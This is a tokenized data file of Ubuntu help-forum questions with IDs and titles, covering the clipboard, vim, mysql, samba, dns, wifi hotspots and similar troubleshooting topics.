[ 2023.676417 ] status code returned 0xc000006d nt_status_logon_failure [ 2023.676424 ] cifs vfs : send error in sesssetup = -13 [ 2023.676499 ] cifs vfs : cifs_mount failed w/return code = -13
468918	does ubuntu have a clipboard that works differently from windows ?	does ubuntu have a clipboard that works differently from windows ? i 've noticed an anomaly between the two , perhaps a bug , or perhaps i 'm misusing the functionality . it works the same way every time and leads to loss of data on my part , so even if it 's me abusing the functionality someone ought to take a look at this . i frequently open up a writer program for it 's spell checking capabilities , etc . ( the ubuntu i 'm using came with libreoffice ) , and now i 've lost text several times because of this weirdness . i 'm trying to train my brain not to automatically close the document after selecting cut . when i write something in libreoffice writer ( either after opening a brand new document or an old one ) , and then select the text i just wrote , and then right-click , then select cut , then close the document ( yes , without saving ) , then try to paste somewhere , i invariably find that there is no content in the clipboard . is this a bug or does ubuntu not have the microsoft equivalent of a clipboard ? if not , then what gives ? is copy paste only workable within certain data scopes ? the capability of copy pasting between programs seems pretty important . i 've tested it out with one other program ( gedit ) , and it did n't lose the content . so i assume it is just a libreoffice bug , as opposed to me misunderstanding the functionality .
468919	why does it take a long time to open certain small text files in vim ?	why does it take a long time to open certain config files accessible only to superuser in vim ? for example : $ sudo vim /var/lib/polkit-1/localauthority/10-vendor.d/com.ubuntu.desktop.pkla it takes 10 seconds on an idle computer for this tiny text file to open up in vim . the time taken is the same no matter how many times i close and open this file . other files owned by a normal user open in a flash . update : i used strace to figure out the cause of the delay . it turns out that the vim-signify plugin that i was using with vim was causing this error . on removing the plugin , vim opens the file in a flash . an issue has been filed with the plugin author .
468920	hardlink count inconsistent with matching files	on searching for files that have hardlinks on my portable hdd using the following command : $ find . ! -type d -links +1 -ls | sort -n i get an output of the following form ( there are hundreds of other files ) 9336 244476 -rw -- -- -- - 2 rishi rishi 250342060 feb 18 15:48 ./unigram_mvt_0.001_9_4_0.001 this shows that the file with inode 9336 has 2 hardlinks . on trying to locate the other one using $ find /media/rishi/ -xdev -inum 9336 i get the output shown below /media/rishi/mvp/unigram_mvt_0.001_9_4_0.001 this indicates that there is only file with inode 9336 i have not created hardlinks myself . these files have been generated on my local disk from a simulation on my computer . i might have copied files for taking backups which could have created these links . the files are currently on my portable hdd since i do not need this data in the near future , i was using gzip to compress it when i came across the hardlinks warning and tried to look into it . is the hardlink count incorrect or am i not able to locate the other hard linked file ? edit : filesystem is fuseblk things tried : used sudo to search . result : same as before compressed file using `` gzip -f '' . result : free space on the disk increased so i guess there were no other files hardlinked used find -name to check if it throws hardlink count is wrong warning . result : no warning checked file system . i think the problem lies here but i 'm not able to resolve it here is the output of disk check : $ sudo ntfsck /dev/sdb1 unsupported : replay_log ( ) unsupported : check_volume ( ) checking 199424 mft records . unsupported cases found . $ sudo ntfsfix /dev/sdb1 mounting volume ... ok processing of $ mft and $ mftmirr completed successfully . ntfs volume version is 3.1 . ntfs partition /dev/sdb1 was processed successfully . even after running ntfsfix , i get the same error on ntfsck
468925	creating a boot iso image from a file	i have written a boot code that i want to run in vmware player . how can i create a disk iso image whose boot sector is my boot code on ubuntu ?
468928	is the window manager handling wine applications differently ?	i 'm not exactly sure how to explain this ; perhaps it is a bug . on some applications that a launched using wine , if you switch window focus away from them , you can not get the focus back . for example if i am playing a game like the sims 3 and i alt-tab , hit the super-key , or do alt-up arrow , i can not get back to the wine application window . it shows the application in unity or gnome shell but when i select it by alt-tabbing to it , or simply clicking on it , it just shows the desktop background . i took a video of it and uploaded it here - http : //youtu.be/eivlx4ybtvg the steps i followed to cause this condition are as follows : launch an application using a 3rd party launcher ( like steam or origin ) wait for the application to fully load alt-tab out of the application try to focus back onto the application i tested this with both compiz and the gnome shell and the results are the exact same .
468929	are toshiba flash drives compatible with ubuntu ?	1 ) are toshiba flash drives compatible with ubuntu ? 2 ) can they be made into ubuntu live usbs ? 3 ) are they compatible with other linux distros ?
468935	can graphics card drivers for quantal be used for 12.04 ?	with an old hp compaq pc , pentium iii 800 mhz with 512 mb ram and a technisat 'airstar 2 pci ' tv card , my wife records/watches tv in windows xp by the dvbviewer program . the picture is very good and smooth even if it quickly changes as by viewing sport . this holds also now after i had to remove the graphics card to be able to install ubuntu 12.04 . but with linux programs me-tv or vlc , video is shown jerkily . according to check if my 12.04 has graphics card drivers and find the right ones i get : user @ cpu : ~ $ lspci | grep vga 00:02.0 vga compatible controller : intel corporation 82815 chipset graphics controller ( cgc ) ( rev 02 ) now the intel driver for the same chip of the pc board is shown in windows hardware manager . i do not see why the graphics does not work in ubuntu so well as in windows . in the me-tv , i have tried all the the video drivers there ; a difference is hardly observable , the 'xshm ' maybe is the best . i intend to try it with different graphic cards . for the matrox g450-32 that i have used in the pc until recently i can not find a driver for linux . i intend to try my vga gainward bliss 9757 - fx5200 that i have successfully used in a similar pentium iv pc with windows . i hope i may use the driver for nvidia from here ( files nvidia-173-updates-dev_173.14.35-0ubuntu1_i386.deb and nvidia-173-updates-dev_173.14.35-0ubuntu1_i386.deb ) . the question is : if i may use them for my ubuntu 12.04 ( pangolin ) while the page title is about drivers for more recent quantal ? is *.deb for 'debian ' sufficient ? thanks !
468936	touchscreen setting 14.04	so i installed 14.04 on an asus q200e with touch screen . previously i had 12.04 and did a new clean install . i was looking forward to better touch screen support . touchscreen works better , no multitouch support , and i ca n't find any settings for it . also when the computer suspends and resumes touchscreen does n't work unless i logout/ login . where can i find settings for touchscreen ? and is there a command line way to reboot the touchscreen when it stops working ?
468938	partition changes name after every reboot	the partition on my c : ( main ssd used for dual booting windows and ubuntu ) drive gets a different name almost every time i reboot . i want to make the partitions name permanent so i can safely link to files . this is what my partitions name looks like : /media/andrew/ac7a30a47a306d68/program files ( x86 ) ... and here are the contents of my fstab file : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda8 during installation uuid=5fcb9158-c68b-47c7-8fe7-e83ceba9cb99 / ext4 errors=remount-ro 0 1 # /boot/efi was on /dev/sda2 during installation uuid=ca2f-944d /boot/efi vfat defaults 0 1 please help . i looked all over the internet but only found these posts whose instructions i do n't really understand . as here > mount point name changed or here > why do disk names change at boot
468943	weird error message and installation failure	i 'm trying to create live usb , and i think my 14.04 distro may be compromised . i just plugged in a new flash drive and an error popped up saying unable to mount usb as it 's already open in another location /media/ ... i 've heard hackers sometimes make programs that give error messages when they 've executed properly . i did n't get the error message putting the flash drive into the usb port 2nd and third time . i opened startup disk creator and tried to make an ubuntu live usb but an error message came up that said only `` installation failed '' . any advice ?
468944	how to partition a ubuntu 12.04 laptop after installation	i would like to add a partition to my laptop hard disk , but i donât know how to do it ... it has the following partitions *dell utility *os *mount point *swap i tried to edit the 488gb partition but i could not . someone tell me how to create a partition in this 488gb which is marked a boot able mount point . i have attached the screen shot from disk utility for reference . laptop is a dell 3537 ubuntu 12.04 , 500gb hard disk . i have added the screen shot .
468945	cg_annotate and callgrind_annotate is showing `` no information has been collected for sourcefile '' in ubuntu	i am new to the valgrind tool and i am using my cross compiled valgrind with arm target board to run my executable . while executing the cachegrind tool with my executable it successfully generating the cachegrind.out.pid file as like below ] /opt/valgrind/bin/valgrind -- tool=cachegrind ./w-rpc file that generated out of it is in the name of cachegrind.out.29271 . since my target board does n't have perl support , i could not able to run cg_annoatate in my target board.so i am running this cg_annoatate file with this cachegrind.out.29271 at my ubuntu machine.but every time it is showing this below information only.i can not able to see the detailed source code analysis information , is that problem of version mismatch or anything i am missing here .please suggest me a solution for this , i am really blocked on this situation and tried almost all possible solution which is available on the valgrind documentation . below is the information that i could able to see from the cachegrind.out.29271 file and at the end of this report it saying `` no information has been collected for /home/radhar/myshare/pb_test/c_rpcmonitor.cc `` , please see the below vbox-linux : ~/myshare/pb_test $ cg_annotate cachegrind.out.29271 /home/radhar/myshare/pb_test/c_rpcmonitor.cc i1 cache : 16384 b , 64 b , 4-way associative d1 cache : 16384 b , 64 b , 4-way associative ll cache : 262144 b , 64 b , 8-way associative command : ./w-rpc_exit data file : cachegrind.out.29271 events recorded : ir i1mr ilmr dr d1mr dlmr dw d1mw dlmw events shown : ir i1mr ilmr dr d1mr dlmr dw d1mw dlmw event sort order : ir i1mr ilmr dr d1mr dlmr dw d1mw dlmw thresholds : 99 0 0 0 0 0 0 0 0 include dirs : user annotated : /home/radhar/myshare/pb_test/c_rpcmonitor.cc auto-annotation : off ir i1mr ilmr dr d1mr dlmr dw d1mw dlmw 38,385,638 14,462 4,450 5,369,475 159,757 63,018 1,424,411 2,155 1,337 program totals ir i1mr ilmr dr d1mr dlmr dw d1mw dlmw file : function 26,263,438 238 23 1,398,703 59,346 15,533 237,160 30 13 ? ? ? : _dl_lookup_hash 9,128,805 6,745 2,174 2,919,360 92,571 43,596 511,921 776 396 ? ? ? : ? ? ? 320,759 58 12 105,071 108 0 72,599 2 0 ? ? ? : pthread_mutex_unlock 293,044 493 10 91,275 252 13 86,395 26 3 ? ? ? : pthread_mutex_lock 232,047 33 2 122,130 47 0 36,639 0 0 ? ? ? : omtimermanager : :lock ( ) const 232,028 27 2 122,120 0 0 36,636 0 0 ? ? ? : omtimermanager : :unlock ( ) const 185,511 24 2 68,015 37 2 68,018 0 0 ? ? ? : pthread_setcanceltype 164,862 88 4 48,848 0 0 24,424 0 0 ? ? ? : omtimermanager : :post ( ) 146,544 47 3 73,272 0 0 24,424 0 0 ? ? ? : omtimermanager : :timetickcbk ( ) 134,355 73 5 67,171 18 0 61,074 0 0 ? ? ? : nanosleep 122,150 14 0 36,645 0 0 36,645 0 0 ? ? ? : linuxmutex : :unlock ( ) 122,150 12 1 36,645 0 0 36,645 0 0 ? ? ? : linuxmutex : :lock ( ) 100,373 41 40 3,903 15 10 16,463 235 234 ? ? ? : _dl_load_elf_shared_library 97,252 875 55 28,280 566 37 12,461 518 371 ? ? ? : malloc 91,605 25 3 24,426 31 0 3 0 0 ? ? ? : linuxtimer : :waitthread ( ) 79,391 35 2 18,321 0 0 12,214 0 0 ? ? ? : omuheap : :isempty ( ) const 67,166 37 1 30,530 50 2 6,106 0 0 ? ? ? : omthread : :isendofprocess ( ) 55,240 0 0 0 0 0 13,810 1 0 ? ? ? : __pthread_unlock 54,954 37 2 18,318 0 0 18,318 0 0 ? ? ? : omtimermanager : :cbkbridge ( void* ) 35,557 6 6 11,905 2,079 2,050 5,948 5 5 ? ? ? : _dl_fixup 27,620 17 6 0 0 0 0 0 0 ? ? ? : __pthread_lock 26,996 4 2 14,292 0 0 9,528 2 0 ? ? ? : _pthread_cleanup_pop_restore 25,552 162 18 12,865 117 16 7,883 8 0 ? ? ? : free -- user-annotated source : /home/radhar/myshare/pb_test/c_rpcmonitor.cc no information has been collected for /home/radhar/myshare/pb_test/c_rpcmonitor.cc exactly i need to see the detailed analysis report of the source file ( which consists of many functions ) ... ? thanks in advance for your time and help , ratheesh
468949	how to install git server with apache authentication on ubuntu 14	i trying to install git server on ubuntu 14 following these steps : www.jmuras.com i made a little change when creating git.conf and symbolic link cause goes on different folders for ubuntu 14 , i did it on /etc/apache2/conf-available/git.conf and symbolic link on /etc/apache2/conf-enabled/git.conf to /etc/apache2/conf-available/git.conf everythings seems to work fine , but when i try to clone the project , after authenticate got this error : fatal : http : //testserver.com/git/newproject/info/refs ? service=git-upload-pack not found : did you run git update-server-info on the server ? and on apache access log : 192.168.70.1 - user [ 18/may/2014:16:24:54 -0700 ] `` get /git/newproject/info/refs ? service=git-upload-pack http/1.1 '' 404 457 `` - '' `` git/1.8.0.msysgit.0 '' 404 error any suggestion ? what 's wrong ?
468950	manually creating casper -rw file	i was wondering if there was a way to create the casper -rw file for persistence manually , i.e . via terminal . i 've been using ubuntu 14.04 live usb with persistence and it ran fine for the last two weeks . last night , i was installing a bunch of apps ( or at least , i thought i was ) and i got a few errors after which the terminal froze . i had no idea what went wrong , so i just forced shut down and fell asleep . this morning , i tried to boot my netbook and the screen went blank after the grub menu and just stayed like that . i figured i must 've accidentally updated the kernel and it messed up the system . so i plugged in another usb with another os in my netbook , booted , browsed to the drive where the casper -rw file was located and deleted it . this solved one problem . i could boot into ubuntu alright , except i just did n't have persistence . so is there a way to manually create the persistence file while i 'm running ubuntu ? i do n't want to do another fresh install as i only have two drives ( one for backup and one for ubuntu ) and my backup drive 's running porteus and it always fails to create bootable usbs due to some module issue . i would also like to know if there 's a way to stop ubuntu from updating kernel so as not to get in the same situation again in the future . thanks !
468951	how to solve critical errors in mysql proxy ?	i have installed the mysql proxy in ubuntu.and when i give mysql-proxy command , i get the following errors ( critical ) admin-plugin.c:569 : -- admin-username needs to be set ( critical ) mainloop.c:267 : applying config of plugin admin failed ( critical ) mysql-proxy-cli.c:596 : failure from chassis_mainloop.shutting down . can anyone solve this issue ? thanks in adavance ! ! !
468952	can ; t view desktop items when switching from gnome to unity	did a basic 14.04 installation . after a while installed gnome 3.10 switched to unity again by selecting from setting icons at gnome login everything is working fine except now i cant view any icons on the desktop or the wallpaper only a dull grey desktop of gnome is visible what can i do to fix this issue
468957	how to find commands for autostarting applications ?	there are two applications i want autostarted , so i searched for it . however , the solutions only tell you how to do it , but not what to put in commands . i use ubuntu 13.10 and want thunderbird and empathy to start on startup . what are the commands that need to be executed ? to be precise , what do i need to put in the `` command '' field when i open the startup applications dialog and try to add a new application there ?
468961	ubuntu 14.04 and xmanager problem	i installed ubuntu 14.04 and when trying to connect by xmanager 4 i got an error message ( gnome-session:8503 ) : critical : we failed , but the fail whale is dead . sorry ... .
468964	ca n't visit any google-related websites , do n't know what 's wrong	occasionally i ca n't visit any google-related websites . this includes google , youtube , chrome and gmail . this also happens when i am using chromium web browser with pepper flash player . it does n't happen all the time , but it can happen for a long time and is very annoying . this only happens when i 'm using ubuntu , on windows i can connect just fine . i noticed though that it appears to be my connection , because i can connect to the websites when i 'm gone on another connection using the same laptop . does anyone have any idea what 's going on ?
468969	i want to setup active directory in ubuntu server for mix environmet ( windows/linux ) to authenticate	i want to migrate my all windows server and workstation to linux system ( ubuntu server 12.04 ) . i am new to linux . i want to create active directory for my linux ( ubuntu ) as well as windows workstations to work parallel ( some system will have ubuntu workstation and some windows 7 ) . now i need assistance to which application would help me to achieve this and what would be the perquisite . needed best procedure to install and maintain the ubuntu server . i hope you understand my requirement . thanks & regards , sam
468975	can not transfer files to the pc through bluetooth	the bluetooth starts by itself on login and when i try to transfer a file from my android phone to it , it does n't accept it . while `` searching , '' my phone shows my pc but the file does n't get accepted .
468976	how to connect mobile broadband using terminal ?	i configured new-mobile-broadband connection . i know that i can connect by clicking as following : but i want to connect manually to that mobile broadband by using terminal . how to do with terminal command ?
468981	how can i give an idea to the ubuntu team ?	sorry for my simple question but it is important . i have many ideas for ubuntu . how can i give them all to ubuntu team . is there any webpage for that or just an email ?
468984	to authenticate using a fingerprint device at log-in screen in ubuntu	i have a non-usb finger print reader based on uart and i am trying to interface it to my computer . basically when the system is booted and is running i can send serial data to my finger print reader and get a reply typically an authentication of a finger print back . i have the device specification and i am communicating with the device by using termios and my problem is i want to do this in the login-screen . so , my idea is to run a custom program while the system is at login screen to communicate with my device and get the authentication back . the device stores the fingerprint templates on board and just sends an authentication packet back . any suggestions to make this happen at login screen would benefit me . thank you .
468986	nemo version is different in synaptic manager	terminal says version 2.0.8 synaptic manager says version 2.2.1 how come they have a different version number ?
468987	how to install adt bundle in ubuntu	i have edubuntu 14.04 running in my computer . i want to install adt bundle . i have extracted it . after that how to install in my ubuntu ?
468988	mysql wo n't be installed on ubuntu	i tried to install apache on ubuntu , and worked , i tried to install php5 on ubuntu , and thats worked too . but if im installed mysql , it wont be installed , i didnt know whats going on , i 'm new to ubuntu here 's my terminal code sudo apt-get -f install mysql-server libapache2-mod-auth-mysql php5-mysql and after i submit that code , it appear like : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : libapache2-mod-auth-mysql : depends : libmysqlclient18 ( > = 5.5.13-1 ) but it is not going to be installed mysql-server : depends : mysql-server-5.5 but it is not going to be installed perl : depends : perl-modules ( > = 5.14.2-6ubuntu2.4 ) but 5.14.2-6ubuntu2.3 is to be installed php5-mysql : depends : libmysqlclient18 ( > = 5.5.13-1 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . so how to fix this issue ? thanks a lot
468992	how to create and configure dns server in ubuntu 14.04 lts server	how to change the name of localhost to custom name which is available to other users in lan as the extension of my previous question i want to know how to implement dns server and configure it . in simple words : all computers that are connected in lan should be able to access in the below way my computer 's ip is 192.168.1.6/myapp it should be accessed from all computers by server/myapp . how can i do this ? note : i do n't want to make change in the hosts file like in the above mentioned questin . i want to make it accessible from all computers . how can i do this ?
468995	can not install openssh server	sudo apt-get install openssh-server i got this error : err mirror : //mirrors.ubuntu.com/mirrors.txt/ precise-updates/main openssh-server i386 1:5.9p1-5ubuntu1.4 no mirror file '/var/lib/apt/mirrors/mirrors.ubuntu.com_mirrors.txt ' found [ mirror : ] err mirror : //mirrors.ubuntu.com/mirrors.txt/ precise/main ssh-import-id all 2.10-0ubuntu1 no mirror file '/var/lib/apt/mirrors/mirrors.ubuntu.com_mirrors.txt ' found [ mirror : ] failed to fetch mirror : //mirrors.ubuntu.com/mirrors.txt/pool/main/o/openssh/openssh-server_5.9p1-5ubuntu1.4_i386.deb no mirror file '/var/lib/apt/mirrors/mirrors.ubuntu.com_mirrors.txt ' found [ mirror : ] failed to fetch mirror : //mirrors.ubuntu.com/mirrors.txt/pool/main/s/ssh-import-id/ssh-import-id_2.10-0ubuntu1_all.deb no mirror file '/var/lib/apt/mirrors/mirrors.ubuntu.com_mirrors.txt ' found [ mirror : ] e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? my /etc/apt/sources.list content is : deb mirror : //mirrors.ubuntu.com/mirrors.txt precise main restricted universe deb mirror : //mirrors.ubuntu.com/mirrors.txt precise-updates main restricted universe multiverse deb mirror : //mirrors.ubuntu.com/mirrors.txt precise-backports main restricted universe multiverse deb mirror : //mirrors.ubuntu.com/mirrors.txt precise-security main restricted universe multiverse why and how to fix it ?
468998	installation did n't find a disk controller during 12.04 server installation	i have a system with the new lsi3008 hba controller . i am installing the ubuntu server 12.04 and when reaching to the discovering of the hard drives the installtion can not find the controller driver . i get a list of all controllers so i browse down to the latest one `` non of the above '' at this time i have to load a driver . lsi is giving a .deb file for the 12.04 lts version . what do i do at this point ?
468999	ubuntu 14.04 gre tunnnel open vswitch 2.01	i installed the 2.0.1 openswitch version included with the ubuntu 14.04 distribution . i set up a simple gee tunnel and containers are pinging each other but any data flux is blocked . this is the ovs-vswitchd.log on the machine trying to pull the data : 2014-05-18t21:54:30.974z|00936|bridge|info|bridge br0 : added interface br0 on port 65534 2014-05-18t21:54:30.975z|00937|bridge|info|bridge br0 : using datapath id 000036aea2271f4d 2014-05-18t21:54:30.975z|00938|connmgr|info|br0 : added service controller `` punix : /var/run/openvswitch/br0.mgmt '' 2014-05-18t22:00:31.421z|00939|bridge|info|bridge br0 : added interface gre0 on port 1 2014-05-18t22:01:54.057z|00940|bridge|info|bridge br0 : added interface pl17753eth1 on port 2 2014-05-19t00:02:08.362z|00941|netdev_linux|warn|dropped 3 log messages in last 7743 seconds ( most recently , 7738 seconds ago ) due to excessive rate 2014-05-19t00:02:08.362z|00942|netdev_linux|warn|ethtool command ethtool_gset on network device pl17753eth1 failed : no such device 2014-05-19t00:02:08.376z|00943|ofproto|warn|dropped 37 log messages in last 7767 seconds ( most recently , 7736 seconds ago ) due to excessive rate 2014-05-19t00:02:08.376z|00944|ofproto|warn|br0 : can not get stp status on nonexistent port 2 2014-05-19t00:02:08.477z|00945|ofproto|warn|br0 : can not get stp status on nonexistent port 2 2014-05-19t00:02:08.634z|00946|ofproto|warn|br0 : can not get stp status on nonexistent port 2 2014-05-19t00:02:09.635z|00947|ofproto|warn|br0 : can not get stp status on nonexistent port 2 2014-05-19t00:02:10.636z|00948|ofproto|warn|br0 : can not get stp status on nonexistent port 2 2014-05-19t00:02:12.014z|00949|netdev_linux|warn|pl17753eth1 : obtaining netdev stats via vport failed ( no such device ) 2014-05-19t00:02:12.014z|00950|netdev_linux|warn|ioctl ( siocgifindex ) on pl17753eth1 device failed : no such device 2014-05-19t00:02:12.014z|00951|netdev_linux|warn|pl17753eth1 : linux-sys get stats failed 19 2014-05-19t00:02:12.014z|00952|netdev_linux|warn|ethtool command ethtool_gdrvinfo on network device pl17753eth1 failed : no such device 2014-05-19t00:02:12.014z|00953|netdev_linux|warn|ethtool command ethtool_gset on network device pl17753eth1 failed : no such device 2014-05-19t00:02:12.014z|00954|netdev_linux|info|ioctl ( siocgifhwaddr ) on pl17753eth1 device failed : no such device this is the output of the ovs-vsctl show command on server one ( 10.1.1.253 ) d7c6fea8-84b5-4be3-a698-a8e61745694c bridge `` br0 '' port `` gre0 '' interface `` gre0 '' type : gre options : { remote_ip= '' 10.1.1.254 '' } port `` pl11394eth1 '' interface `` pl11394eth1 '' port `` br0 '' interface `` br0 '' type : internal ovs_version : â2.0.1 '' and on server two ( 10.1.1.254 ) e1e27383-c41e-45ac-aa1e-db835cc47388 bridge `` br0 '' port `` gre0 '' interface `` gre0 '' type : gre options : { remote_ip= '' 10.1.1.253 '' } port `` pl17753eth1 '' interface `` pl17753eth1 '' port `` br0 '' interface `` br0 '' type : internal ovs_version : `` 2.0.1 '' tunnel was working with same configuration ubuntu 12.04 and open vswitch 2.1.2 what can be the issue ?
469004	cant install program using apt-get like virtualbox or cmake	i am using kubuntu 14.04 lts running on intel core i3 , and has amd 6000m radion gpu when i am going to install cmake or virtual box using terminal i always get this : error sudo apt-get install cmake reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : cmake-data gcc gcc-4.8 libasan0 libatomic1 libc-dev-bin libc6-dev libgcc-4.8-dev libitm1 libtsan0 linux-libc-dev manpages-dev suggested packages : codeblocks eclipse gcc-multilib autoconf automake1.9 libtool flex bison gcc-doc gcc-4.8-multilib gcc-4.8-doc gcc-4.8-locales libgcc1-dbg libgomp1-dbg libitm1-dbg libatomic1-dbg libasan0-dbg libtsan0-dbg libbacktrace1-dbg libquadmath0-dbg glibc-doc the following new packages will be installed : cmake cmake-data gcc gcc-4.8 libasan0 libatomic1 libc-dev-bin libc6-dev libgcc-4.8-dev libitm1 libtsan0 linux-libc-dev manpages-dev 0 upgraded , 13 newly installed , 0 to remove and 0 not upgraded . need to get 2,618 kb/14.8 mb of archives . after this operation , 57.5 mb of additional disk space will be used . do you want to continue ? [ y/n ] y media change : please insert the disc labeled 'kubuntu 14.04 lts _trusty tahr_ - release amd64 ( 20140416.1 ) ' in the drive '/media/cdrom/ ' and press enter i 've searched lot on google but cant get satisfactory answer . i am expecting answer to solve this problem .
469005	i want to change ubuntu 14.04 from 64 bit to 32 bit	how can i change ubuntu 14.04 from 64 bit to 32 bit ?
469006	within maas , how can i activate all nic 's after default installer was running	i am evaluating maas to provision servers . during comissioning maas detects all nic 's and is also able to to assign ip addresses to them during this process . once i start a node or deploy a service with juju the installation starts but the node at the end has only 1 nic up and running , all the other ones are not configured . how can i achieve the situation that after mass default installer all nics are configured and received their network configuration via dhcp ? as a side not , not all servers have the same amount of nic 's some has 2 nic 's others have 4 nic 's . thanks for your help .
469010	qt creator learning tutorial for ubuntu 12.04	i am a new user for ubuntu and qt creator , i want to learn qt program with examples . where could i find documentation about qt creator ?
469011	not working indicator minbar application ubuntu	the appindicator of minbar , an application installed from the ubuntu software center is not working . i am currently using ubuntu 14.04 . kindly please do tell me if there is a solution . thank you !
469012	hibernation causes reboot	i 'm running lxde , when i try choosing `` hibernate '' from the power menu i get a gdbus.error.org.freedesktop.dbus.error.accessdenied : operation not permitted error . to see whether the `` underlying machinery '' works i tried invoking sudo pm-hibernate from the command line . essentially the machine shut down without warning . when i restarted it it went through an apparently ordinary boot sequence . i 'm guessing that it actually did successfully write the memory image onto the swap partition ( which , likely not coincidentally , resides within a luks lvm ) but had no idea it needed to look for it at boot . i heard it mentioned that some kernel parameters should be passed by grub at boot-time , and of course i expect it to require the password/key to unlock my luks volume , but can somebody provide a little more information or point me in the right direction ? later i 'll worry about the operation-not-permitted access-denied error ... thanks .
469013	how can i configure the public and cluster network with the juju ceph charm	i deployed ceph via juju and the ceph charm . my servers have 3 nic 's ( eth0 for management , eth1 , public storage network , eth2 for cluster network ) . when i deploy ceph via juju it installs all the monitors and the ods ( local disks ) very nicely and easy . when i look at ceph.conf it only uses eth0 for the communication . changing the ceph.conf does not help as juju overwrites it again . is there a way to be able to configure it ? thanks for your help .
469014	how to re-apply fixed viewports after resolution change	i have setup ccsm so that some applications always open on certain viewports ( aka workspaces ) using the place windows option in ccsm . the problem is that if i remove my laptop from my monitor or change resolutions , the windows are moved around and tend to land in completely different workspaces and things become a mess . i would like , at the very least , to be able to run a script that re-applies all of my place window settings , so that i could re-position all of my windows automatically instead of having to drag them back to the proper workspace . better yet , i would like an option so that all windows stay on their workplace after a resolution change . has anybody else experienced this and come up with any clever workarounds ?
469016	reload os after motherboard change ?	i reloaded my pc with 14.04 64 bit and to be fair it was struggling . so i `` upgraded '' from a amd 64bit 3500 to a intel core duo . pretty much just swapped out the motherboard and hooked everything up again . out of interest i tried to boot to see if it would work , and it did n't flinch . is it worth reloading the pc with the new hardware when it appears to function perfectly ?
469017	possible dns problem unable to connect to us.archive.ubuntu.com	i just upgraded my ubuntu server via command line to version 12.04 . i was on 11.10 , so when i upgraded i have to switch the sources in source.list to the old-releases.ubuntu.com source . everything worked fine . anyway , now i want to upgrade again , but the problem is my server is having a problem contacted the us.archive.ubuntu.com server . when i do apt-get update i get many errors that look like this : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-security/universe/i18n/translation-en something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) pinging us.archive.ubuntu.com does n't work with unknown host error . i also tried ping google.com and it did n't work either . pinging 8.8.8.8 however did work . so i am wondering what has happened . i was poking around the web and it seems like its a dns issue , but i do n't know what to do . my /etc/resolv.conf file is blank . does anyone know how i can fix this issue ?
469018	ubuntu 12.04 default wallpaper for all users	i want to be able to change the default background ( wallpaper ) for all new accounts . not enforce it after that , but it should be on as default choice . i need to do this on 12.04 with unity and i need to be able to do it from the shell ( as it will be installed through a package ) . any ideas ?
469022	traverse all the disks or get hd_struct by device name in kernel module	i 'm writing a kernel module ( on linux 2.6.32 ) , to get the disk_stats of all the disks ( not partition ) in use . in other words , i 'm getting the data just like what /sys/block/sda/stat shows , but in kernel module . ( note : by 'not partition ' , i mean we just handle sda and ignore sda1/sda2/etc , for example . ) is there anything like for_each_netdev or for_each_possible_cpu for block device ? beacuse there may be multiple disks and i need a way to traverse them . or at the latest , how can i get the related data structure with the block device 's name ( like sda ) ? i know we can get a disk 's disk_stats from the disk 's hd_struct , but how could i get this hd_struct ? i have read linux2.6.32/block/genhd.c , and i know the content of file /sys/block/sda/stat is generated by diskstats_show . but how does the second argument come ? please help me . thanks .
469030	seems ubuntu can not read sd cards ?	ubuntu can not read my sd card . many people have pleaded passionately for help with this problem on this board ... and no one seems to have received an answer . i just upgraded to 14.04 , but , alas , to not avail . put the sd card into the usb slot and nothing at all happens . this has been a problem with ubuntu for many years , judging from the history of complaints about it . it 's odd that it can not be fixed . every cheap mp3 player can read one of those sd cards as easy as pie !
469035	error `` undefined reference to xercesc_2_7 ''	i 've been trying to install sumo and only recently got the ./configure to make all of the files ; but , when i try to 'make ' it gives the [ all-recursive error 1 : ../utils/xml/libxml.a ( sumosaxattributesimpl_xerces.o ) : in function `sumosaxattributesimpl_xerces : :getfloat ( std : :basic_string < char , std : :char_traits < char > , std : :allocator < char > > const & ) const ' : sumosaxattributesimpl_xerces.cpp : ( .text+0x9ff ) : undefined reference to `xercesc_2_7 : :xmlstring : :transcode ( char const* ) ' collect2 : ld returned 1 exit status make [ 2 ] : *** [ netgen ] error 1 make [ 2 ] : leaving directory `/home/rezekiekawaty/downloads/sumo-0.12.3/src/netgen' make [ 1 ] : *** [ install-recursive ] error 1 make [ 1 ] : leaving directory `/home/rezekiekawaty/downloads/sumo-0.12.3/src' make : *** [ install-recursive ] error 1 do you have any idea to troubleshoot this problem ?
469039	ubuntu touch on htc desire x	i want to install ubuntu touch in htc desire x . can you please let me know whether this is possible or not. ? if it 's provide me some guide to install and if not , let ubuntu developers to work on desire x product too . thank you
469042	wirless hotspot in ubuntu 14.04	hi friends am using ubuntu 14.04 and am tired of searching software to make my laptop a hotspot i tried installing ap-hotspot but when i type sudo ap-hotspot start , it freezes and when i type sudo ap-hotspot stop , it displays not in active .so please help what is a best way to fix it.i even tried this cd /tmp wget http : //archive.ubuntu.com/ubuntu/pool/universe/w/wpa/hostapd_1.0-3ubuntu2.1_i386.deb sudo dpkg -i hostapd*.deb sudo apt-mark hold hostapd note : i want this wifi for my android mobile
469043	how can i start automatically start a tmux session on login ?	i want to automatically start a new tmux session if there are none available when i sudo to root . e.g . reboot pc login as normal user via ssh sudo -s ( which would then automatically create a new tmux session ) i open another terminal/putty windows and login repeat 2 and 3 but this time , no session will be created as there 's already one . any ideas how this can be done ? thanks very much : )
469044	unable to save via samba share to ubuntu vm	i have a ubuntu virtual machine running with virtualbox on my win7 laptop and i connect to the filesystem in windows via a samba share . this all works fine . however , i am unable to edit a file on ubuntu through windows as i get a bunch of permission errors . i have the following directory at /var/www/ : drwxr-xr-x 12 vagrant vagrant 4096 may 16 16:02 sylius/ is this a configuration issue with samba or elsewhere ?
469049	will i get notifications for updates for packages in backport ?	if i install a package from the backports repository , will it get automatically updated with 'dist-upgrade ' later on or should i follow it by myself and update it manually when new version is released in backports ?
